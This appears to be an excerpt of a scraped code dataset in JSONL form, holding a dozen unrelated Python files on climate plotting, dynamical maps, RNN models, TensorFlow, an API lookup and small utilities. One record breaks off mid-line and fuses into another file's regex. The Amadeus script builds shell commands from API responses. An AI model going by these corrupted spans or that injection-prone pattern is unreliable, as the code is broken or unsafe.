rotated_pole)\n\n\n # create country's borders and landsea mask\n #land_50m = cfeature.NaturalEarthFeature('cultural', 'admin_0_countries', '50m', edgecolor='black', facecolor='none', linewidth=0.2)\n broder_50m = cfeature.NaturalEarthFeature('physical', 'coastline', '50m', edgecolor='black', facecolor='none', linewidth=0.8)\n if max is None:\n max = np.nanmax(field)\n if min is None:\n min = np.nanmin(field)\n # activate the labels and set countour of the countourf\n draw_labels = True\n reversed_cmap = False\n levels = np.arange(min, max, 0.05)\n color_map = plt.cm.get_cmap(colormap)\n if reversed_cmap:\n reversed_color_map = color_map.reversed()\n else:\n reversed_color_map = color_map\n plt.gca().set_facecolor(\"dimgrey\")\n\n if centered_bar:\n norm = TwoSlopeNorm(vmin=min, vmax=max, vcenter=0.0001)\n # plot in each subplot\n h = plt.contourf(lon, lat, field[:,:], levels=levels, cmap=reversed_color_map, extend='both', norm=norm)\n else:\n h = plt.contourf(lon, lat, field[:,:], levels=levels, cmap=reversed_color_map , extend='both')\n axes.set_title(title, fontsize=25, weight=\"bold\")\n\n ## add borders and landsea mask\n #axes.add_feature(land_50m)\n if coastline:\n axes.add_feature(broder_50m)\n \n gl = axes.gridlines(color='black', linestyle='--', linewidth=1., alpha=0.35, draw_labels=draw_labels, dms=True, x_inline=False, y_inline=False)\n gl.ylocator = mticker.FixedLocator(np.arange(-60, 80, 10))\n gl.xlocator = mticker.FixedLocator(np.arange(-100, 90 ,10))\n gl.xlabel_style = {'size':12, 'rotation': 0, 'rotation_mode': 'anchor'}\n gl.ylabel_style = {'size':12, 'rotation': 0, 'rotation_mode': 'anchor'}\n gl.top_labels = False\n gl.right_labels = False\n gl.left_labels = False\n gl.bottom_labels = True\n gl.left_labels = True\n\n #set colorbar\n cb = plt.colorbar(orientation=\"horizontal\", shrink=0.4, pad=0.07, format=\"%.2f\")\n cb.ax.tick_params(labelsize=14)\n cb.set_label(label= str(metric),fontsize=20)\n\n plt.tight_layout()\n plt.savefig(str(filename) + \".png\")\n \n# create var wherre to store others\nresult = np.zeros((1,224,544))\n\n\nera5_old = xr.open_dataset(\"old_version.nc\")\nera5_new = xr.open_dataset(\"new_version.nc\")\ntas = xr.open_dataset(\"ts_delta.nc\")\ntos = xr.open_dataset(\"tos_delta.nc\")\n\n\nlon = tos.variables['lon'][:]\nlat = tos.variables['lat'][:]\nmonth = 0\nprint(\"loads done\")\nplot(\"old_final_temp\", era5_old.variables['T_SKIN'][0,:,:].values, \"Final PGW Temperature w/o sea ice update\", \n \"T_SKIN [K]\", lon, lat)\nprint(\"1 done\")\nplot(\"new_final_temp\", era5_new.variables['T_SKIN'][0,:,:].values, \"Final PGW Temperature with sea ice update\", \n \"T_SKIN [K]\", lon, lat)\nprint(\"2 done\")\nplot(\"old_final_sic\", era5_old.variables['FR_SEA_ICE'][0,:,:].values, \"ERA5 Sea Ice\", \n \"Sea Ice frac [1]\", lon, lat)\nprint(\"3 done\")\nplot(\"new_final_sic\", era5_new.variables['FR_SEA_ICE'][0,:,:].values, \"PGW Sea Ice\", \n \"Sea Ice frac [1]\", lon, lat)\nprint(\"4 done\")\n\nplot(\"diff_winter\", result - tas.variables['tas'][month,:,:].values,\"Differences between new and previous PGW versions for January\", \n \"TAS delta [K]\",lon,lat )\nplot(\"tas_winter\"+addon, tas.variables['tas'][month,:,:].values, \"TAS field from previous PGW version for January\", \n \"TAS delta [K]\",lon,lat )\n\nplot (\"cdo_winter\"+addon, cdo.variables['tos'][month,:,:].values, \"SST field from bi-linear interpolation for January\", \n \"SST delta [K]\",lon,lat )\nplot (\"sst\"+addon, tos.variables['sst'][month,:,:].values, \"SST field from NaN-ignoring interpolation using kernel interp for January\", \n \"SST delta [K]\" ,lon,lat)\n\nplot (\"sst_tas_diff\"+addon, tos.variables['sst'][month,:,:].values- tas.variables['tas'][month,:,:].values, \"Differences between SST and TAS for January\", \n \"SST delta [K]\",lon,lat)\nplot (\"ice\"+addon, era5.variables['FR_SEA_ICE'][0,:,:].values, \"Sea ice fraction from ERA5 for January\", \n \"Ice fraction [%]\",lon,lat, colormap=\"Blues\")\nlon = christoph.variables['lon'][:]\nlat = christoph.variables['lat'][:]\nprint(np.sum(christoph.variables['ts'][0,:,:].values))\nprint(np.sum(christoph.variables['ts'][0,:,:].values)/ (len(lon)*len(lat)))\nplot (\"heim\", christoph.variables['ts'][0,:,:].values, \"Differences between TS and SST for January\", \n \"Temperature [K]\",lon,lat)\n\n\ndef plot_paper(filename, field, title, metric, max=None, min=None, lat_pole=90, lon_pole=-180, \n coastline=True, colormap=\"RdBu_r\"): \n\n rotated_pole = ccrs.RotatedPole(pole_latitude = lat_pole, pole_longitude = lon_pole)\n data_crs = ccrs.PlateCarree()\n \n # create the plot and set the size\n fig, axs = plt.subplots(1,3, sharex=True, sharey=True , subplot_kw=dict(projection= rotated_pole), figsize = (20*3,10))\n fig.subplots_adjust( wspace=0.05, left=0.05, right=0.99, bottom=0.12, top=0.92)\n #fig.suptitle(r'$\\Delta$'+ \"SST comparison between native GCM data, bi-linear interpolation \\n and NaN-ignoring interpolation\", fontsize=30, weight=\"bold\")\n\n # create country's borders and landsea mask\n #land_50m = cfeature.NaturalEarthFeature('cultural', 'admin_0_countries', '50m', edgecolor='black', facecolor='none', linewidth=0.2)\n broder_50m = cfeature.NaturalEarthFeature('physical', 'coastline', '50m', edgecolor='black', facecolor='none', linewidth=0.8)\n if max == None:\n max = np.nanmax(field)\n if min == None:\n min = np.nanmin(field)\n # activate the labels and set countour of the countourf\n draw_labels = True\n reversed_cmap = False\n levels = np.arange(min, max, 0.05)\n color_map = plt.cm.get_cmap(\"Reds\")\n if reversed_cmap == True:\n reversed_color_map = color_map.reversed()\n else:\n reversed_color_map = color_map\n #plt.gca().set_facecolor(\"dimgrey\")\n #norm = TwoSlopeNorm(vmin=min, vmax = max, vcenter=0.0001)\n origin_dim = raw_sst.coords['longitude'].values.shape\n lon_raw = raw_sst.coords['longitude'].values.reshape(-1)\n for i in range(len(lon_raw)):\n if lon_raw[i] > 180:\n lon_raw[i] -= 360 \n # plot in each subplot\n h1 = axs[0].contourf(lon_raw.reshape(origin_dim), raw_sst.coords['latitude'].values, raw_sst.variables['tos'][month,:,:].values, levels=levels, cmap=reversed_color_map , extend='both')\n axs[0].set_title(r'$\\Delta$SST on GCM ocean model grid', fontsize=25, weight=\"bold\")\n ## add borders and landsea mask\n #axes.add_feature(land_50m)\n if coastline:\n axs[0].add_feature(broder_50m)\n \n gl = axs[0].gridlines(color='black', linestyle='--', linewidth=1., alpha=0.35, draw_labels=draw_labels, dms=True, x_inline=False, y_inline=False)\n gl.ylocator = mticker.FixedLocator(np.arange(-60, 80, 10))\n gl.xlocator = mticker.FixedLocator(np.arange(-100, 90 ,10))\n gl.xlabel_style = {'size':12, 'rotation': 0, 'rotation_mode': 'anchor'}\n gl.ylabel_style = {'size':12, 'rotation': 0, 'rotation_mode': 'anchor'}\n gl.top_labels = False\n gl.right_labels = False\n gl.left_labels = False\n gl.bottom_labels = True\n gl.left_labels = True\n \n # plot in each subplot\n h = axs[1].contourf(lon[210:-150], lat[30:-115], cdo.variables['tos'][month,:,:].values[30:-115,210:-150], levels=levels, cmap=reversed_color_map , extend='both')\n axs[1].set_title(r'$\\Delta$'+ \"SST using bi-linear interpolation\", fontsize=25, weight=\"bold\")\n ## add borders and landsea mask\n #axes.add_feature(land_50m)\n if coastline:\n axs[1].add_feature(broder_50m)\n \n gl = axs[1].gridlines(color='black', linestyle='--', linewidth=1., alpha=0.35, draw_labels=draw_labels, dms=True, x_inline=False, y_inline=False)\n gl.ylocator = mticker.FixedLocator(np.arange(-60, 80, 10))\n gl.xlocator = mticker.FixedLocator(np.arange(-100, 90 ,10))\n gl.xlabel_style = {'size':12, 'rotation': 0, 'rotation_mode': 'anchor'}\n gl.ylabel_style = {'size':12, 'rotation': 0, 'rotation_mode': 'anchor'}\n gl.top_labels = False\n gl.right_labels = False\n gl.left_labels = False\n gl.bottom_labels = True\n gl.left_labels = True\n\n # plot in each subplot\n h = axs[2].contourf(lon[210:-150], lat[30:-115], tos.variables['sst'][month,:,:].values[30:-115,210:-150], levels=levels, cmap=reversed_color_map , extend='both')\n axs[2].set_title(r'$\\Delta$'+ \"SST using NaN-ignoring interpolation\", fontsize=25, weight=\"bold\")\n ## add borders and landsea mask\n #axes.add_feature(land_50m)\n if coastline:\n axs[2].add_feature(broder_50m)\n \n gl = axs[2].gridlines(color='black', linestyle='--', linewidth=1., alpha=0.35, draw_labels=draw_labels, dms=True, x_inline=False, y_inline=False)\n gl.ylocator = mticker.FixedLocator(np.arange(-60, 80, 10))\n gl.xlocator = mticker.FixedLocator(np.arange(-100, 90 ,10))\n gl.xlabel_style = {'size':12, 'rotation': 0, 'rotation_mode': 'anchor'}\n gl.ylabel_style = {'size':12, 'rotation': 0, 'rotation_mode': 'anchor'}\n gl.top_labels = False\n gl.right_labels = False\n gl.left_labels = False\n gl.bottom_labels = True\n gl.left_labels = True \n\n #set colorbar\n cb = mpu.colorbar(h1, axs[1], orientation = 'horizontal', pad = 0.15, aspect=50, format='%.1f') \n cb.ax.tick_params(labelsize=14)\n cb.set_label(label=\"SST delta [K]\",fontsize=20)\n\n #plt.tight_layout()\n plt.savefig(str(filename) + \".png\")\n\n#plot_paper(\"jonas_figure\"+addon, raw_sst.variables['tos'][month,:,:].values, \"Combined TAS field from NaN-ignoring interpolation for January\", \n# \"TAS delta [K]\")\n\"\"\"\n","sub_path":"fields/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":14422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"627265760","text":"from __future__ import division\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nk = 3.0\nxf = 1.2#不動点の位置\nxb = 1.0\ne2 = k * xf * (np.exp(-8 * xb * (2 * xf - xb)) / (1 - np.exp(-32 * xf * xb)))\niterate = 2\nlegendswitch = True#凡例の表示\ndmap = plt.get_cmap(\"tab10\")\n\ndef interpolated_intercepts(x, y1, y2):\n \"\"\"Find the intercepts of two curves, given by the same x data\"\"\"\n \n def intercept(point1, point2, point3, point4):\n \"\"\"find the intersection between two lines\n the first line is defined by the line between point1 and point2\n the first line is defined by the line between point3 and point4\n each point is an (x,y) tuple.\n \n So, for example, you can find the intersection between\n intercept((0,0), (1,1), (0,1), (1,0)) = (0.5, 0.5)\n \n Returns: the intercept, in (x,y) format\n \"\"\"\n \n def line(p1, p2):\n A = (p1[1] - p2[1])\n B = (p2[0] - p1[0])\n C = (p1[0]*p2[1] - p2[0]*p1[1])\n return A, B, -C\n \n def intersection(L1, L2):\n D = L1[0] * L2[1] - L1[1] * L2[0]\n Dx = L1[2] * L2[1] - L1[1] * L2[2]\n Dy = L1[0] * L2[2] - L1[2] * L2[0]\n \n x = Dx / D\n y = Dy / D\n return x,y\n \n L1 = line([point1[0],point1[1]], [point2[0],point2[1]])\n L2 = line([point3[0],point3[1]], [point4[0],point4[1]])\n \n R = intersection(L1, L2)\n \n return R\n\n idxs = np.argwhere(np.diff(np.sign(y1 - y2)) != 0)\n\n xcs = []\n ycs = []\n\n for idx in idxs:\n xc, yc = intercept((x[idx], y1[idx]),((x[idx+1], y1[idx+1])), ((x[idx], y2[idx])), ((x[idx+1], y2[idx+1])))\n xcs.append(xc)\n ycs.append(yc)\n return np.array(xcs), np.array(ycs)\n\n\n\nclass KScatteringMap:\n def __init__(self,k,xf,xb):\n self.k = k\n self.xf = xf\n self.xb = xb\n def ScattMapt(self,qp):\n for i in range(step):\n qp[0],qp[1] = U(qp)\n return qp[0],qp[1]\n \n #正の時間方向の写像\n def U(self,qp):\n return np.array([qp[0] + qp[1] - 0.5 * dotV(qp[0]), qp[1] - 0.5 * dotV(qp[0]) - 0.5 * dotV(qp[0] + qp[1] - 0.5 * dotV(qp[0]))],dtype = np.float64)\n \n #逆写像\n def Ui(self,qp):\n return np.array([qp[0] - qp[1] - 0.5 * dotV(qp[0]), qp[1] + 0.5 * dotV(qp[0]) + 0.5 * dotV(qp[0] - qp[1] - 0.5 * dotV(qp[0]))],dtype = np.float64)\n\n\ndef ScattMapt(qp,iterate1):\n for i in range(iterate1):\n qp = cmap.U(qp)\n return np.array([qp[0],qp[1]],dtype = np.float64)\ndef ScattMapti(qp,iterate1):\n for i in range(iterate1):\n qp = cmap.Ui(qp)\n return np.array([qp[0],qp[1]], dtype = np.float64)\n\ndef dotV(x):\n return k * x * np.exp(-8 * x**2) - e2 * (np.exp(-8 * pow(x - xb, 2)) - np.exp(-8 * pow(x + xb, 2)))\n\n\ndef Mapline(x,lines,iterate1):#テメェでxを入れて進めろ.\n y = lines(x,0)\n for i in range(iterate1):\n [x,y] = cmap.Ui([x,y])\n return [x,y]\n\ndef symline1(x,iterate1): #周期 2i+1\n y = 2 * x - (1/2) * dotV(x)\n for i in range(iterate1):\n [x,y] = cmap.Ui([x,y])\n return y\ndef symline2(x,iterate2): #周期2i+1\n y = - (1/2) * dotV(x)\n for i in range(iterate2):\n [x,y] = cmap.Ui([x,y])\n return y\ndef symline3(x,iterate3):#周期2i\n y = np.zeros(len(x))\n for i in range(iterate3):\n [x,y] = cmap.Ui([x,y])\n return y\ndef symline4(y,iterate4):#周期2i\n x = np.zeros(len(y))\n for i in range(iterate4):\n [x,y] = cmap.Ui([x,y])\n return x\n\ncmap = KScatteringMap(k,xf,xb)\n\ndef main():\n iterate1 = 3\n iterate2 = 0\n x = np.linspace(-1.3, 1.3, 20)\n y1 = symline1(x,iterate1)\n y2 = symline2(x,iterate2)\n #plt.plot(x, y1, marker='o', mec='none', ms=4, lw=1, label='y1')\n #plt.plot(x, y2, marker='o', mec='none', ms=4, lw=1, label='y2')\n np.set_printoptions(precision = 12)\n idx = np.argwhere(np.diff(np.sign(y1 - y2)) != 0)\n print(idx) #インデックスが欲しくてしょうがない.\n x3,y3 = Mapline(x,symline1,iterate1)\n x4,y4 = Mapline(x,symline2,iterate2)\n plt.plot(x3,y3,marker = 'o',mec = 'none',ms = 4, lw = 1, label = 'y1')\n plt.plot(x4, y4, marker='o', mec='none', ms=4, lw = 1, label='y2')\n plt.plot(x3[idx], y3[idx], 'ms', ms=7, label='Nearest data-point method')\n # new method!\n xcs, ycs = interpolated_intercepts(x,y1,y2)\n for xc, yc in zip(xcs, ycs):\n plt.plot(xc, yc, 'co', ms=5)\n #print(xgenuine,ygenuine)\n plt.legend(frameon=False, fontsize=10, numpoints=1, loc='lower left')\n plt.savefig('symmetryline.png', dpi=200)\n plt.show()\n\nif __name__ == '__main__': \n main()\n","sub_path":"interpolatetest.py","file_name":"interpolatetest.py","file_ext":"py","file_size_in_byte":4752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"112743649","text":"Bonus\r\na=0\r\nb=0\r\ndef myfun():\r\n global a,b\r\n n=int(input(\"Enter a number\"))\r\n if num==n:\r\n a=a+1\r\n \r\n print(\" {} cow\\n {} bull\\n\".format(a,b))\r\n elif num([\\s\\S]+)', flags=re.M)\n # replace regex to scrub HTML tags\n self.regex_html_tag = re.compile(r'', flags=re.M | re.DOTALL)\n\n def extract_element_content(self, tag, content):\n # compile a regex for this tag on demand\n if tag not in self.regex_dict:\n self.regex_dict[tag] = re.compile(rf'<{tag}>([\\s\\S]*?)<\\/{tag}>', flags=re.M)\n\n # match the element pattern and return its inner text\n regex = self.regex_dict[tag]\n match = regex.search(content).group(1).strip()\n\n return match\n\n def extract_html_text(self, content):\n # find the content of the webpage (requires regex because it's not element-enclosed)\n raw_match = self.regex_web.search(content).group(1).strip()\n # clean up the HTML tags inside the content by regex replace\n match_untagged = self.regex_html_tag.sub('', raw_match).strip()\n\n return match_untagged\n","sub_path":"src/PreProcessData/XmlParseService.py","file_name":"XmlParseService.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"346129646","text":"from regression_test_utils import log_test_case\nimport logging\nlogger = logging.getLogger(__name__)\n\nlogging.basicConfig(filename='test_log.log', level=logging.DEBUG)\n\nclass test_program(object):\n\n\t@log_test_case(logger, __name__)\n\tdef combine(method_name, log_file):\n\t\tresult = method_name + \" \" + log_file\n\t\treturn result;\n\n\tcombine('my_method,', 'results')\n","sub_path":"regression_test_utils/combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"37151811","text":"import urllib ,sys , json , os, time\n\nAPI_KEY = '*******************'\n\nresponse = urllib.urlopen('http://api.sandbox.amadeus.com/v1.2/airports/autocomplete?apikey='+API_KEY +'&term='+ sys.argv[1])\n\nresponseText = json.loads(response.read())\n\nall_prf = len(responseText)\ninfo_origin = []\nfor i in range(0,all_prf):\n info_origin.append(responseText[i]['value'])\n info_origin.append(responseText[i]['label'])\n os.system('python /home/shreyakupadhyay/Documents/yatra-hackathon/get_flights.py ' + str(responseText[i]['value']) + ' ' + 'BLR')\n","sub_path":"get_id.py","file_name":"get_id.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"194186637","text":"import numpy\n\nimport data_algebra\nimport data_algebra.util\nimport data_algebra.connected_components\n\n\nclass CustomFunction:\n def __init__(self, name, pandas_formatter, implementation):\n self.name = name\n self.pandas_formatter = pandas_formatter\n self.implementation = implementation\n\n def format_for_pandas(self, expr):\n return self.pandas_formatter(expr)\n\n\ndef make_custom_function_map(data_model):\n if data_model is None:\n data_model = data_algebra.default_data_model\n custom_functions = [\n CustomFunction(\n name=\"is_bad\",\n pandas_formatter=lambda expr: \"@is_bad(\" + expr.args[0].to_pandas() + \")\",\n implementation=lambda x: data_model.bad_column_positions(x),\n ),\n CustomFunction(\n name=\"is_null\",\n pandas_formatter=lambda expr: \"@is_null(\" + expr.args[0].to_pandas() + \")\",\n implementation=lambda x: data_model.isnull(x),\n ),\n CustomFunction(\n name=\"if_else\",\n pandas_formatter=lambda expr: (\n \"@if_else(\"\n + expr.args[0].to_pandas()\n + \", \"\n + expr.args[1].to_pandas()\n + \", \"\n + expr.args[2].to_pandas()\n + \")\"\n ),\n implementation=lambda c, x, y: numpy.where(c, x, y),\n ),\n CustomFunction(\n name=\"neg\",\n pandas_formatter=lambda expr: \"-\"\n + expr.args[0].to_pandas(want_inline_parens=True),\n implementation=lambda x: numpy.negative(x),\n ),\n CustomFunction(\n name=\"co_equalizer\",\n pandas_formatter=lambda expr: (\n \"@co_equalizer(\"\n + expr.args[0].to_pandas()\n + \", \"\n + expr.args[1].to_pandas()\n + \")\"\n ),\n implementation=lambda f, g: data_algebra.connected_components.connected_components(\n f, g\n ),\n ),\n CustomFunction(\n name=\"connected_components\",\n pandas_formatter=lambda expr: (\n \"@connected_components(\"\n + expr.args[0].to_pandas()\n + \", \"\n + expr.args[1].to_pandas()\n + \")\"\n ),\n implementation=lambda f, g: data_algebra.connected_components.connected_components(\n f, g\n ),\n ),\n CustomFunction(\n name=\"partitioned_eval\",\n pandas_formatter=lambda expr: (\n \"@partitioned_eval(\"\n # expr.args[0] is a FnTerm\n + \"@\"\n + expr.args[0].to_pandas()\n + \", \"\n # expr.args[1] is a ListTerm\n + \"[\"\n + \", \".join([ei.to_pandas() for ei in expr.args[1].value])\n + \"]\"\n + \", \"\n # expr.args[2] is a ListTerm\n + \"[\"\n + \", \".join([ei.to_pandas() for ei in expr.args[2].value])\n + \"]\"\n + \")\"\n ),\n implementation=lambda fn, arg_columns, partition_columns: (\n data_algebra.connected_components.partitioned_eval(\n fn, arg_columns, partition_columns\n )\n ),\n ),\n CustomFunction(\n name=\"max\",\n pandas_formatter=lambda expr: (\"@max(\" + expr.args[0].to_pandas() + \")\"),\n implementation=lambda x: [numpy.max(x)] * len(x),\n ),\n CustomFunction(\n name=\"min\",\n pandas_formatter=lambda expr: (\"@min(\" + expr.args[0].to_pandas() + \")\"),\n implementation=lambda x: [numpy.min(x)] * len(x),\n ),\n CustomFunction(\n name=\"fn\", # special case, user defined function\n pandas_formatter=lambda expr: \"@fn(\" + expr.args[0].to_pandas() + \")\",\n implementation=None,\n ),\n ]\n mp = {cf.name: cf for cf in custom_functions}\n return mp\n","sub_path":"data_algebra/custom_functions.py","file_name":"custom_functions.py","file_ext":"py","file_size_in_byte":4066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"281247869","text":"# -*- coding: utf-8 -*-\nfrom ..layer_operation import LayerOperation\nimport tensorflow as tf\nimport re\n\nclass op_tf_c_momentumoptimizer(LayerOperation):\n\n _attributes = \"\"\"[\\\n {\"default\": 0.9, \"source\": \"opt\", \"mandatory\": \"both\", \"name\": \"momentum\"}]\"\"\"\n\n def compile_time_operation(self, learning_option, cluster):\n pass\n\n def run_time_operation(self, learning_option, cluster):\n def apiConstructor(input_, learning_rate, momentum, use_nesterov):\n momentumopt = tf.train.MomentumOptimizer(learning_rate, momentum, use_nesterov=use_nesterov)\n momentumopt_ = momentumopt.minimize(input_, colocate_gradients_with_ops=True, global_step=global_step)\n return momentumopt_\n\n learning_rate = learning_option.get(\"learning_rate\")\n momentum = learning_option.get(\"momentum\", self.momentum)\n use_nesterov = False# use nesterov optimizer using nesterovoptimizer\n input_ = self.get_input('loss')\n\n device = self.get_attr('device')\n num = re.sub('[^0-9]', '', cluster.get('types')[device])\n type = cluster.get('types')[device].replace(str(num), '')\n\n with tf.name_scope(self.name) as scope:\n global_step = tf.train.get_or_create_global_step()\n if learning_option.get(\"parallel\", None) != \"DP\":\n with tf.device('/job:worker/task:{0}/{1}:{2}'.format(device, type, num)):\n momentumopt_ = apiConstructor(input_, learning_rate, momentum, use_nesterov)\n else:\n momentumopt_ = apiConstructor(input_, learning_rate, momentum, use_nesterov)\n self.set_output('output', momentumopt_)\n self.set_output('global_step', global_step)","sub_path":"src/DLMDL/LayerOperation/tf.old/c_momentumoptimizer.py","file_name":"c_momentumoptimizer.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"112250713","text":"#!/usr/bin/python\n# coding:utf-8\n# Copyright (C) 2005-2016 All rights reserved.\n# FILENAME: \t requests_pkg.py\n# VERSION: \t 1.0\n# CREATED: \t 2016-01-14 20:25\n# AUTHOR: \t xuexiang\n# DESCRIPTION: requests类的包裹器\n#\n# HISTORY:\n#*************************************************************\nimport time\nimport requests\nfrom random_useragent import getRandomUA\n\n\ndef get(url, max_try=3, timeout=100):\n try_count = 0\n while True:\n h_heads = getRandomUA()\n resp = requests.get(url, headers=h_heads, timeout=timeout)\n try_count += 1\n if resp:\n return resp\n else:\n if try_count >= max_try:\n return None\n time.sleep(3)\n","sub_path":"email_server/requests_pkg.py","file_name":"requests_pkg.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"199887875","text":"#! /usr/bin/python3\n\nimport sys\nimport math\nimport random\nfrom collections import Counter\n\nSEED = 782\nrandom.seed(SEED)\ntrain_file = open(\"data/NLSPARQL.train.data\", \"r\")\ntrain_feat = open(\"data/NLSPARQL.train.feats.txt\", \"r\")\n\nlexicon_word = open(\"data/lexicon_word_enanched.txt\", \"w\")\nlexicon_label = open(\"data/lexicon_label_enanched.txt\", \"w\")\n\ntraining_set = open(\"data/training_set_enanched\", \"w\")\nvalidation_set = open(\"data/validation_set_enanched\", \"w\")\n\ntest_file = open(\"data/NLSPARQL.test.data\", \"r\")\ntest_feat = open(\"data/NLSPARQL.test.feats.txt\", \"r\")\n\nsplit_f = train_feat.read().split('\\n')\nsplit_t = train_file.read().split('\\n')\nsplit_test_f = test_feat.read().split('\\n')\nsplit_test_t = test_file.read().split('\\n')\nvalidation_set_len = int(sys.argv[1])\nword_lemma_pos_iob = []\nwords = []\niob = []\nline = []\nsentences = []\n\nfor x,y in zip(split_t, split_f):\n if x != '' and y != '':\n a, b = x.split('\\t') #word iob\n c, d, e = y.split('\\t') #word pos lemma\n if b == \"O\":\n words.append(a)\n iob.append(\"$-\"+a)\n line.append((a, \"$-\"+a))\n else:\n words.append(a)\n iob.append(b)\n line.append((a,b))\n else:\n sentences.append(line)\n line = []\n\nfor x,y in zip(split_test_t, split_test_f):\n if x != '' and y != '':\n a, b = x.split('\\t') #word iob\n c, d, e = y.split('\\t') #word pos lemma\n iob.append(b)\n\nrandom.shuffle(sentences)\n###########################################################################################################\n# LEXICON WORD\n\ncounted_words = Counter(words)\nconta = 0\n\nfor i in counted_words:\n lexicon_word.write(str(i) + \"\\t\" + str(conta) + \"\\n\")\n conta += 1\n\nlexicon_word.write(\"\\t\" + str(conta) + \"\\n\")\n\n###########################################################################################################\n# LEXICON IOB\n\ncounted_iob = Counter(iob)\nconta1 = 0\n\nfor i in counted_iob:\n lexicon_label.write(str(i) + \"\\t\" + str(conta1) + \"\\n\")\n conta1 += 1\n\n###########################################################################################################\n\nvalidation_data = sentences[:validation_set_len]\ntrain_data = sentences[validation_set_len:]\n\nfor i in train_data:\n for x in i:\n training_set.write(str(x[0]) + \"\\t\" + str(x[1]) + \"\\n\")\n training_set.write(\"\\n\")\n\nfor i in validation_data:\n for x in i:\n validation_set.write(str(x[0]) + \"\\t\" + str(x[1]) + \"\\n\")\n validation_set.write(\"\\n\")\n","sub_path":"RNN/generator_file_enanched.py","file_name":"generator_file_enanched.py","file_ext":"py","file_size_in_byte":2564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"78585112","text":"import climate\nimport numpy as np\nimport theanets\nimport theano\nimport theano.tensor as TT\n\ng = climate.add_group('ARRNN Experiment')\ng.add_argument('--model', metavar='rnn|arrnn|mrnn|lstm',\n help='use this recurrent model')\ng.add_argument('--size', type=int, metavar='N',\n help='use N units in recurrent layer')\n\n\ndef build(args, in_dim=1, out_dim=1):\n return theanets.Experiment(\n theanets.recurrent.Regressor,\n layers=(in_dim, (args.model, args.size), out_dim),\n batch_size=args.batch_size,\n )\n\n\nRRNN = theanets.layers.RNN\nLEVELS = (0.1, 0.3, 0.5, 0.7, 0.9)\n\n\nclass FR(RRNN):\n '''RNN with fixed rates.'''\n\n def __init__(self, *args, **kwargs):\n super(FR, self).__init__(*args, **kwargs)\n self.rate = theano.shared(\n np.linspace(0, 1, self.nout + 2)[1:-1].astype('f'),\n self._fmt('r'))\n\n def transform(self, inputs):\n def fn(x_t, h_tm1):\n r_t = self.rate\n h_t = self.activate(x_t + TT.dot(h_tm1, self.find('hh')))\n return r_t * h_tm1 + (1 - r_t) * h_t\n x = TT.dot(inputs, self.find('xh')) + self.find('b')\n output, updates = self._scan(fn, [x])\n monitors = self._monitors(output) + self._monitors(\n self.rate, 'rate', levels=LEVELS)\n return output, monitors, updates\n\n\nclass LR(RRNN):\n '''RNN with learnable rate vector.'''\n\n def setup(self):\n self.log_setup(self.add_weights('xh') +\n self.add_weights('hh', self.nout) +\n self.add_bias('b') +\n self.add_bias('r'))\n\n def transform(self, inputs):\n def fn(x_t, h_tm1):\n r_t = TT.nnet.sigmoid(self.find('r'))\n h_t = self.activate(x_t + TT.dot(h_tm1, self.find('hh')))\n return r_t * h_tm1 + (1 - r_t) * h_t\n x = TT.dot(inputs, self.find('xh')) + self.find('b')\n output, updates = self._scan(fn, [x])\n monitors = self._monitors(output) + self._monitors(\n self.find('r'), 'rate', levels=LEVELS)\n return output, monitors, updates\n\n\nclass LIR(RRNN):\n '''RNN with rates computed from input values.'''\n\n def setup(self):\n self.log_setup(self.add_weights('xh') +\n self.add_weights('xr') +\n self.add_weights('hh', self.nout) +\n self.add_bias('b') +\n self.add_bias('r'))\n\n def transform(self, inputs):\n def fn(x_t, r_t, h_tm1):\n h_t = self.activate(x_t + TT.dot(h_tm1, self.find('hh')))\n return r_t * h_tm1 + (1 - r_t) * h_t\n x = inputs\n h = TT.dot(x, self.find('xh')) + self.find('b')\n r = TT.nnet.sigmoid(TT.dot(x, self.find('xr')) + self.find('r'))\n output, updates = self._scan(fn, [h, r], [x])\n monitors = self._monitors(output) + self._monitors(\n r, 'rate', levels=LEVELS)\n return output, monitors, updates\n\n\nclass LIHR(RRNN):\n '''RNN with rates computed from hiddens and inputs.'''\n\n def setup(self):\n self.log_setup(self.add_weights('xh') +\n self.add_weights('xr') +\n self.add_weights('hh', self.nout) +\n self.add_weights('hr', self.nout) +\n self.add_bias('b') +\n self.add_bias('r'))\n\n def transform(self, inputs):\n def fn(x_t, r_t, h_tm1):\n r_t = TT.nnet.sigmoid(r_t + TT.dot(h_tm1, self.find('hr')))\n h_t = self.activate(x_t + TT.dot(h_tm1, self.find('hh')))\n return r_t, r_t * h_tm1 + (1 - r_t) * h_t\n x = inputs\n h = TT.dot(x, self.find('xh')) + self.find('b')\n r = TT.nnet.sigmoid(TT.dot(x, self.find('xr')) + self.find('r'))\n (rate, output), updates = self._scan(fn, [h, r], [None, x])\n monitors = self._monitors(output) + self._monitors(\n rate, 'rate', levels=LEVELS)\n return output, monitors, updates\n","sub_path":"tasks/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"428048029","text":"import pytest\n\ndef add(a, b):\n return a + b\n\n@pytest.mark.parametrize(\"a, b, expected\", [\n (1, 2, 3),\n (0, 0, 0),\n])\n@pytest.mark.parametrize(\"description\", [\n \"positive numbers\",\n \"zeroes\",\n])\ndef test_addition(a, b, expected, description):\n result = add(a, b)\n assert result == expected, 